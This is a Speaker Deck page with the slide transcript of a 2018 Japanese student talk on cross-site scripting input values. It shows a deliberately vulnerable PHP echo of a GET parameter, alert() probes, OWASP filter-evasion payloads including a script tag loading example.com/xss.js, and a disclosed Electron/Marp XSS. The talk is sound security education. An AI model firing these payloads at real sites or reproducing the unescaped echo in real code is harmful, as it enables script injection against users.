Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Sponsored
·
Your Podcast. Everywhere. Effortlessly.
Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
→
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.5k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Query Prediction for Log Search for Distributed Tracing with External Monitoring Alerts
tomoyk
0
15
Root Cause Analysis for Middleware Issues by Kubernetes Resource Events / KST-2026
tomoyk
0
26
Reading HTTP Client Hints
tomoyk
0
120
Log message with JSON item count for root cause analysis in microservices
tomoyk
1
250
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
380
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
460
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
1
1k
検索性能に配慮した複製による分散ログ管理 / DPS-185
tomoyk
0
10
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
430
Other Decks in Technology
See All in Technology
SaaSからAIへの過渡期の中で現在、組織内で起こっている変化 / SaaS to AI Paradigm Shift
aeonpeople
0
120
タスク管理も1on1も、もう「管理」じゃない ― KiroとBedrock AgentCoreで変わった"判断の仕事"
yusukeshimizu
5
2.4k
楽しく学ぼう!コミュニティ入門 AWSと人が つむいできたストーリー
hiroramos4
PRO
1
180
20260311 ビジネスSWG活動報告(デジタルアイデンティティ人材育成推進WG Ph2 活動報告会)
oidfj
0
160
フルカイテン株式会社 エンジニア向け採用資料
fullkaiten
0
11k
Security Diaries of an Open Source IAM
ahus1
0
210
Oracle Database@AWS:サービス概要のご紹介
oracle4engineer
PRO
3
1.7k
複数クラスタ運用と検索の高度化:ビズリーチにおけるElastic活用事例 / ElasticON Tokyo2026
visional_engineering_and_design
0
110
GitLab Duo Agent Platform + Local LLMサービングで幸せになりたい
jyoshise
0
220
Claude Codeの進化と各機能の活かし方
oikon48
22
11k
Oracle Database@Azure:サービス概要のご紹介
oracle4engineer
PRO
4
1.1k
Syncでつながるアジャイル 部署の壁を越えて進化し続けるチームづくり / Agile practices connecting and syncing beyond departmental boundaries
muit
0
110
Featured
See All Featured
First, design no harm
axbom
PRO
2
1.1k
What's in a price? How to price your products and services
michaelherold
247
13k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
47
8k
The Invisible Side of Design
smashingmag
302
51k
[RailsConf 2023] Rails as a piece of cake
palkan
59
6.4k
GraphQLの誤解/rethinking-graphql
sonatard
75
11k
A brief & incomplete history of UX Design for the World Wide Web: 1989–2019
jct
1
320
Code Reviewing Like a Champion
maltzj
528
40k
Building an army of robots
kneath
306
46k
Tips & Tricks on How to Get Your First Job In Tech
honzajavorek
0
450
SEO Brein meetup: CTRL+C is not how to scale international SEO
lindahogenes
0
2.4k
How People are Using Generative and Agentic AI to Supercharge Their Products, Projects, Services and Value Streams Today
helenjbeal
1
140
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron
tomoyk
aeonpeople
yusukeshimizu
hiroramos4
.png){kind=avatar}
oidfj
fullkaiten
ahus1
oracle4engineer
visional_engineering_and_design
jyoshise
oikon48
muit
axbom
michaelherold
eileencodes
smashingmag
palkan
sonatard
jct
maltzj
kneath
honzajavorek
lindahogenes
.png){kind=avatar}
helenjbeal
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_3.jpg){kind=link}
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_4.jpg){kind=link}
![[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_13.jpg){kind=link}
![[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_14.jpg){kind=link}
![[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_15.jpg){kind=link}
